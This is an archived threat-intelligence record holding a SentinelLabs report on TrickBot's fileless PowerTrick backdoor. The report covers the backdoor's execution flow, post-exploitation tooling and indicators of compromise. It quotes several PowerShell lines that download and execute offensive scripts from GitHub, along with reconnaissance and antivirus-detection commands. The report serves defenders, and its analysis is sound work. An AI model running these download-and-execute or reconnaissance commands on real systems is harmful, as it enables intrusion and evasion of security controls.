{
	"id": "e756145e-5fef-43f1-8de9-7ae8931902f5",
	"created_at": "2026-04-06T00:07:09.461967Z",
	"updated_at": "2026-04-10T03:20:00.564346Z",
	"deleted_at": null,
	"sha1_hash": "a3985225b9e6281d6ca31aaacef98f4be4e78080",
	"title": "Top-Tier Russian Organized Cybercrime Group Unveils Fileless Stealthy “PowerTrick” Backdoor for High-Value Targets - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3255011,
	"plain_text": "Top-Tier Russian Organized Cybercrime Group Unveils Fileless\r\nStealthy “PowerTrick” Backdoor for High-Value Targets -\r\nSentinelLabs\r\nBy Vitali Kremez\r\nPublished: 2020-01-09 · Archived: 2026-04-05 16:16:28 UTC\r\nResearch by: Vitali Kremez, Joshua Platt and Jason Reaves\r\nRead the Full Report\r\nExecutive Summary\r\nThe TrickBot cybercrime enterprise actively develops many of its offensive tools such as “PowerTrick”\r\nthat are leveraged for stealthiness, persistence, and reconnaissance inside infected high-value targets such\r\nas financial institutions.\r\nMany of their offensive tools remain undetected for the most part as they are used for a short period of time\r\nfor targeted post-exploitation purposes such as lateral movement.\r\nTheir offensive tooling such as “PowerTrick” is flexible and effective which allows the TrickBot\r\ncybercrime actors to leverage them to augment on the fly and stay stealthy as opposed to using larger more\r\nopen source systems such as PowerShell Empire.\r\nThe end-goal of the PowerTrick backdoor and its approach is to bypass restrictions and security controls to\r\nadapt to the new age of security controls and exploit the most protected and secure high-value networks.\r\nSentinelLabs developed mock command-and-control panels to allow the institutions to utilize them for\r\ntesting detections related to “PowerTrick”.\r\nBackground\r\nTrickBot is the successor of Dyre [1, 2] which at first was primarily focused on banking fraud in the same manner\r\nthat Dyre did utilize injection systems. TrickBot has shifted focus to enterprise environments over the years to\r\nincorporate many techniques from network profiling, mass data collection, incorporation of lateral traversal\r\nexploits. 
This focus shift is also evident in the malware and techniques they incorporate into their tertiary deliveries targeting enterprise environments; it is similar to a company whose focus shifts depending on what generates the best revenue. This research follows SentinelLabs' discovery of the TrickBot Anchor malware and its nexus to organized groups and advanced persistent threats.\r\nhttps://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/\r\nPage 1 of 10\n\nGraph 1: Image of interactive human network exploitation operator within TrickBot enterprise\r\nPowerTrick Discovery\r\nSentinelLabs research into this PowerShell-based backdoor called “PowerTrick” traces back to the initial infection. We assess with high confidence that at least some of the initial PowerTrick infections are being kicked off as a PowerShell task through normal TrickBot infections, utilizing a repurposed backconnect module called “NewBCtest” that can accept commands to execute.\r\nGraph 2: Image of PowerTrick execution flow\r\nAfter the initial stager for the PowerTrick backdoor is kicked off, the actor issues the first command, which is to download a larger backdoor. 
This process is similar to what you see in PowerShell Empire with its stager component.\r\nFigure 1: The malware operator issues the first command to download the backdoor.\r\nPowerTrick is designed to execute commands and return the results in Base64 format. The system uses a generated UUID based on computer information as a “botID”.\r\nFigure 2: A unique user ID (UUID) is generated for each bot\r\nThe victim data is then posted back to the controller.\r\nFigure 3: The victim data is posted back to the backend.\r\nPowerTrick is simply designed to execute commands and return results.\r\nFigure 4: Main functionality of PowerTrick\r\nPowerTrick: Actions on Objective\r\nAside from the PowerTrick backdoor, the criminal actors also commonly utilize other PowerShell utilities for various tasks. A frequently used one was ‘letmein.ps1’, a PowerShell stager for the open-source exploitation framework Metasploit.\r\niex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerS\r\niex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/mas\r\niex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSp\r\niex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSp\r\nThe letmein script, in particular, is leveraged frequently to pivot the infection to another framework.\r\nFigure 5: The actors download and execute the letmein stager.\r\nIt is also used to detonate on other systems after pivoting.\r\nFigure 6: use of network drives to 
download and execute the letmein stager.\r\nThe frequently used commands and actions are as follows:\r\nnet view\r\nnet use\r\nping systems\r\nnet use with usernames to check permissions on systems\r\nWMIC /node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List\r\nOnce the system and network have been profiled, the actors perform deletion and cleanup operations. They remove any existing files that did not execute properly and either move on to a different target of choice or perform lateral movement inside the environment to high-value systems such as financial gateways. The executed tasks included a wide range of utilities, such as the previously shown Metasploit. Other interesting deliveries are discussed below:\r\nGraph 3: Summary of PowerTrick Connections to Known Malware\r\nI. TrickBot Anchor Malware\r\nThe TrickBot Anchor DNS variant [3] is frequently leveraged as an attack framework for enterprise environments.\r\nII. TerraLoader, “more_eggs” Backdoor\r\nTerraLoader variant version “6.0” with the more_eggs JavaScript backdoor onboard is a deployed payload, often in addition to the aforementioned Anchor DNS variant on the same systems.\r\nFigure 7: The decoded “more_eggs” backdoor from TerraLoader.\r\nIII. 
Direct Shellcode\r\nDirect shellcode execution is a methodology for payload deployment via a hexlified parameter.\r\nFigure 8: The command is designed to process shellcode as a parameter.\r\nThis is something we have observed frequently: the actors will modify or create new delivery systems in order to bypass restrictions and security controls.\r\nAttacker View: How PowerTrick Drops TrickBot Anchor Bot\r\nI. Launch PowerShell\r\nThe PowerTrick session is initialized with the following command:\r\nAfter PowerTrick is successfully executed, a child PowerShell process is created and the attacker issues a series of commands in an effort to choose an existing directory on the system.\r\nII. The dir command is executed to check the filesystem\r\nIII. Execute PowerShell script to download Anchor DNS\r\nIV. After the script is executed, the “dir” command is issued again to verify the download was successful.\r\nV. After verifying the download, the file is executed and the scheduled tasks are checked.\r\nVI. The directory is checked again to verify the file successfully self-deleted.\r\nVII. In this particular case, a second PowerShell task is executed via PowerTrick. This file is the more_eggs backdoor described above.\r\nVIII. Once again the directory is checked to verify the download was successful. In each case the existing folder name is used for the file.\r\nIX. After download verification, the file is executed\r\nX. 
The directory is again checked to verify the file was run and self-deleted.\r\nXI. The following PowerShell command is executed to check for the presence of anti-virus products\r\nXII. Processes checked\r\nXIII. Session is killed\r\nAnalyst Note:\r\nThe PowerShell task parent window name was OleMainThreadWndName, while the child had the normal name C:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.\r\nIndicators of Compromise\r\nAnchor (SHA-256): 254e7a333ecee6d486b4f8892fe292fb7ba1471fe500651c1ba3e7ff5c9e03c8\r\nTerraLoader (SHA-256): dcf714bfc35071af9fa04c4329c94e385472388f9715f2da7496b415f1a5aa03\r\nIOCs on GitHub\r\nReferences\r\n1: https://www.malwarebytes.com/blog/news/2016/10/trick-bot-dyrezas-successor\r\n2: https://www.fidelissecurity.com/threatgeek/archive/trickbot-we-missed-you-dyre/\r\n3: https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns\r\nSource: https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/"
	],
	"report_names": [
		"top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets"
	],
	"threat_actors": [],
	"ts_created_at": 1775434029,
	"ts_updated_at": 1775791200,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3985225b9e6281d6ca31aaacef98f4be4e78080.pdf",
		"text": "https://archive.orkl.eu/a3985225b9e6281d6ca31aaacef98f4be4e78080.txt",
		"img": "https://archive.orkl.eu/a3985225b9e6281d6ca31aaacef98f4be4e78080.jpg"
	}
}